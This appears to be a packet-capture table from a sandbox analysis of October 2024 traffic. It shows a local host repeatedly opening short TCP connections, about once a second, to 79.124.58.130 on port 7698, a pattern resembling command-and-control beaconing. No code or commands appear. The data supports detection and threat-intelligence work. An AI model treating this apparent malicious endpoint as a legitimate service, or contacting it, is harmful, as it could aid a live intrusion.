Oct 23, 2024 17:27:44.122451067 CEST	7698	49833	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:44.122580051 CEST	49833	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:44.122735977 CEST	7698	49832	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:44.122781992 CEST	49832	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:44.122919083 CEST	49833	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:44.130019903 CEST	7698	49833	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:45.002471924 CEST	7698	49833	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:45.002587080 CEST	49833	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.114722013 CEST	49833	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.114835024 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.120301008 CEST	7698	49834	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:45.120721102 CEST	7698	49833	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:45.120837927 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.120841026 CEST	49833	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.121009111 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:45.127207041 CEST	7698	49834	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:46.020327091 CEST	7698	49834	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:46.023593903 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.130569935 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.131093979 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.136526108 CEST	7698	49834	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:46.136567116 CEST	7698	49835	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:46.136590958 CEST	49834	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.136655092 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.136836052 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:46.142663956 CEST	7698	49835	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:47.029922009 CEST	7698	49835	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:47.030003071 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.146039963 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.146214962 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.152005911 CEST	7698	49835	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:47.152132988 CEST	7698	49836	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:47.153628111 CEST	49835	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.153716087 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.155597925 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:47.161422014 CEST	7698	49836	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:48.041570902 CEST	7698	49836	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:48.041714907 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.145981073 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.146445036 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.151938915 CEST	7698	49836	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:48.152498007 CEST	7698	49837	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:48.155257940 CEST	49836	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.155324936 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.155539036 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:48.161206961 CEST	7698	49837	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:49.042835951 CEST	7698	49837	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:49.042900085 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.161650896 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.167507887 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.167741060 CEST	7698	49837	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:49.170737982 CEST	49837	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.173108101 CEST	7698	49838	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:49.173614025 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.173845053 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:49.179178953 CEST	7698	49838	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:50.079205036 CEST	7698	49838	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:50.079596043 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.194446087 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.194876909 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.200566053 CEST	7698	49838	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:50.200596094 CEST	7698	49839	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:50.200635910 CEST	49838	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.200702906 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.200819969 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:50.206216097 CEST	7698	49839	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:51.101269960 CEST	7698	49839	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:51.102593899 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.207812071 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.210474968 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.214137077 CEST	7698	49839	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:51.215940952 CEST	7698	49840	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:51.219567060 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.219569921 CEST	49839	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.219774961 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:51.225259066 CEST	7698	49840	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:52.102122068 CEST	7698	49840	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:52.103524923 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.208529949 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.208997011 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.214518070 CEST	7698	49841	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:52.214591980 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.214672089 CEST	7698	49840	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:52.214752913 CEST	49840	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.214818001 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:52.220370054 CEST	7698	49841	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:53.098347902 CEST	7698	49841	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:53.098404884 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.207818031 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.208220005 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.213515997 CEST	7698	49841	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:53.213546991 CEST	7698	49842	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:53.213603020 CEST	49841	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.213699102 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.213886976 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:53.219163895 CEST	7698	49842	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:54.095227957 CEST	7698	49842	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:54.095582008 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.209359884 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.210083961 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.215425014 CEST	7698	49842	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:54.215495110 CEST	49842	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.215548038 CEST	7698	49843	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:54.215615988 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.215893984 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:54.221342087 CEST	7698	49843	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:55.108541965 CEST	7698	49843	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:55.111707926 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.223543882 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.224750042 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.230365992 CEST	7698	49843	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:55.230515957 CEST	49843	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.230787039 CEST	7698	49844	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:55.231348991 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.231817961 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:55.237397909 CEST	7698	49844	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:56.127742052 CEST	7698	49844	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:56.127798080 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.279421091 CEST	7698	49844	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:56.279486895 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.452322960 CEST	49844	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.453517914 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.457803011 CEST	7698	49844	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:56.459105015 CEST	7698	49845	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:56.459450960 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.465920925 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:56.471189976 CEST	7698	49845	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:57.402141094 CEST	7698	49845	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:57.402822018 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.497262955 CEST	7698	49845	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:57.499454975 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.520384073 CEST	49845	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.520845890 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.525798082 CEST	7698	49845	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:57.526268959 CEST	7698	49846	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:57.526515007 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.526540995 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:57.531939030 CEST	7698	49846	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:58.429080009 CEST	7698	49846	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:58.429739952 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.542601109 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.543037891 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.548449039 CEST	7698	49847	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:58.548517942 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.548894882 CEST	7698	49846	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:58.549015999 CEST	49846	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.550431967 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:58.555888891 CEST	7698	49847	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:59.437581062 CEST	7698	49847	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:59.437944889 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.551532030 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.552090883 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.557702065 CEST	7698	49847	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:59.557751894 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:27:59.557769060 CEST	49847	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.557956934 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.558159113 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:27:59.563549995 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.414793968 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.414962053 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.415122986 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.415177107 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.415333986 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.415935040 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.416425943 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.417229891 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.417229891 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.417509079 CEST	49848	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.425796032 CEST	7698	49848	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.526673079 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.532548904 CEST	7698	49849	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:01.535552979 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.535897017 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:01.541522026 CEST	7698	49849	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:02.440095901 CEST	7698	49849	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:02.440156937 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.552814007 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.553183079 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.707254887 CEST	7698	49849	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:02.707329988 CEST	49849	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.708141088 CEST	7698	49849	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:02.708214998 CEST	7698	49850	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:02.708276987 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.708583117 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:02.713924885 CEST	7698	49850	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:03.601550102 CEST	7698	49850	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:03.602837086 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.707947016 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.710531950 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.713932037 CEST	7698	49850	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:03.714118004 CEST	49850	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.716021061 CEST	7698	49851	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:03.719607115 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.722500086 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:03.727889061 CEST	7698	49851	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:04.599414110 CEST	7698	49851	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:04.599476099 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.709429979 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.709938049 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.715303898 CEST	7698	49851	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:04.715317965 CEST	7698	49852	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:04.715362072 CEST	49851	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.715399027 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.715565920 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:04.720835924 CEST	7698	49852	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:05.607338905 CEST	7698	49852	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:05.607702017 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.723731041 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.726145029 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.729480982 CEST	7698	49852	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:05.731455088 CEST	7698	49853	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:05.731637955 CEST	49852	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.733488083 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.739466906 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:05.744900942 CEST	7698	49853	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:06.622812986 CEST	7698	49853	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:06.622899055 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.742839098 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.743432045 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.749209881 CEST	7698	49853	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:06.749217987 CEST	7698	49854	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:06.749284029 CEST	49853	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.749357939 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.750047922 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:06.757754087 CEST	7698	49854	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:07.762600899 CEST	7698	49854	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:07.763719082 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.793613911 CEST	7698	49854	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:07.793790102 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.883474112 CEST	49854	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.883701086 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.888971090 CEST	7698	49854	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:07.889084101 CEST	7698	49855	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:07.891726017 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.893140078 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:07.898566008 CEST	7698	49855	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:08.785279989 CEST	7698	49855	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:08.786098957 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.932480097 CEST	7698	49855	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:08.932637930 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.975155115 CEST	49855	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.975630999 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.980469942 CEST	7698	49855	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:08.980940104 CEST	7698	49856	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:08.981009960 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.981128931 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:08.987255096 CEST	7698	49856	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:09.874308109 CEST	7698	49856	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:09.874412060 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:09.989016056 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:09.989459991 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:09.994746923 CEST	7698	49856	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:09.994772911 CEST	7698	49857	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:09.994858027 CEST	49856	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:09.994939089 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:09.995105982 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:10.000340939 CEST	7698	49857	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:10.898179054 CEST	7698	49857	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:10.898283958 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.004062891 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.007460117 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.010049105 CEST	7698	49857	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:11.010096073 CEST	49857	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.012773991 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:11.012835026 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.014548063 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:11.019881010 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.154958963 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.155030012 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.155702114 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.155713081 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.155755997 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.155776978 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.271497011 CEST	49858	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.272001982 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.276835918 CEST	7698	49858	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.277367115 CEST	7698	49859	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:12.277440071 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.277590036 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:12.282835007 CEST	7698	49859	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:13.210488081 CEST	7698	49859	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:13.211766958 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.317408085 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.318222046 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.323394060 CEST	7698	49859	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:13.323643923 CEST	7698	49860	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:13.323815107 CEST	49859	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.323817968 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.324081898 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:13.329437017 CEST	7698	49860	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:14.208570004 CEST	7698	49860	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:14.208633900 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.356404066 CEST	7698	49860	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:14.356545925 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.524761915 CEST	49860	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.525553942 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.530930996 CEST	7698	49860	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:14.531102896 CEST	7698	49861	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:14.531215906 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.609340906 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:14.614953995 CEST	7698	49861	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:15.433098078 CEST	7698	49861	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:15.433361053 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.552265882 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.552270889 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.753134966 CEST	7698	49861	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:15.754462957 CEST	49861	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.759028912 CEST	7698	49861	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:15.759046078 CEST	7698	49862	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:15.759267092 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.759576082 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:15.765635967 CEST	7698	49862	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:16.651694059 CEST	7698	49862	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:16.651853085 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.772572041 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.773046970 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.778812885 CEST	7698	49862	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:16.778893948 CEST	7698	49863	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:16.778893948 CEST	49862	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.778983116 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.779421091 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:16.784935951 CEST	7698	49863	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:17.701622009 CEST	7698	49863	79.124.58.130	192.168.2.8
Oct 23, 2024 17:28:17.702552080 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:17.817641020 CEST	49863	7698	192.168.2.8	79.124.58.130
Oct 23, 2024 17:28:17.818042040 CEST	49864	7698	192.168.2.8	79.124.58.130
